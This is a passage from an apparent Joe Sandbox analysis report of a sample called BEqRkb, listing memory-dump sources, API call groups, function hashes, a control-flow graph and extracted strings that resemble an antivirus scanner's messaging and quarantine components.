                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContext
                                                                                        • String ID:
                                                                                        • API String ID: 2202868296-0
                                                                                        • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                                        • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                                                        • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                                        • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                        • String ID:
                                                                                        • API String ID: 15204871-0
                                                                                        • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                                        • Instruction ID: 1b2b05230377b3175670e92c5f414f6eb15caa164b20ce4f2f35e47aa6c98fab
                                                                                        • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                                        • Instruction Fuzzy Hash: 4BB12873605B89CBEB15CF6AC48636C37A2F745F68F1489A2DA5D837A4CB39D851C700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 203985260-0
                                                                                        • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                                        • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                                                        • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                                        • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                                        • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                                                        • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                                        • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                                        • Instruction ID: e9e63e4b960bd7cfcb34c2f37e5de1f20d0a3ececb1af84c9e184d25eec958d8
                                                                                        • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                                        • Instruction Fuzzy Hash: 9D51F862B0CB8185FB109B73A8405BA7BA2BB41BA4F1441B6EF5C67AA9DF3CD401C700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: EntryFunctionLookup
                                                                                        • String ID:
                                                                                        • API String ID: 3852435196-0
                                                                                        • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                                        • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                                                        • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                                        • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547889144
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547889144
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547889144
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547889144
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547889144
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                                                        • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                                                        • API String ID: 1021822269-3147033232
                                                                                        • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                                        • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                                                        • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                                        • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                                                        • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                                                        • API String ID: 883923345-381368982
                                                                                        • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                                        • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                                                        • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                                        • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                                                        • String ID:
                                                                                        • API String ID: 1613947383-0
                                                                                        • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                                        • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                                                        • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                                        • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                        • String ID:
                                                                                        • API String ID: 1995290849-0
                                                                                        • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                                        • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                                                        • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                                        • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                        • String ID:
                                                                                        • API String ID: 1995290849-0
                                                                                        • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                                        • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                                                        • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                                        • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                                                        • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                        • API String ID: 93015348-1041928032
                                                                                        • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                                        • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                                                        • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                                        • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                                                        • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                                                        • API String ID: 3682727354-300733478
                                                                                        • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                                        • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                                                        • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                                        • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                                                        • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                                                        • API String ID: 2587151837-1427723692
                                                                                        • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                                        • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                                                        • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                                        • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                                                        • String ID: SetDllDirectoryW$kernel32.dll
                                                                                        • API String ID: 3184163350-3826188083
                                                                                        • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                                        • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                                                        • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                                        • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcesslstrlen
                                                                                        • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                        • API String ID: 3424473247-996641649
                                                                                        • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                                        • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                                                        • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                                        • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1775797328-0
                                                                                        • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
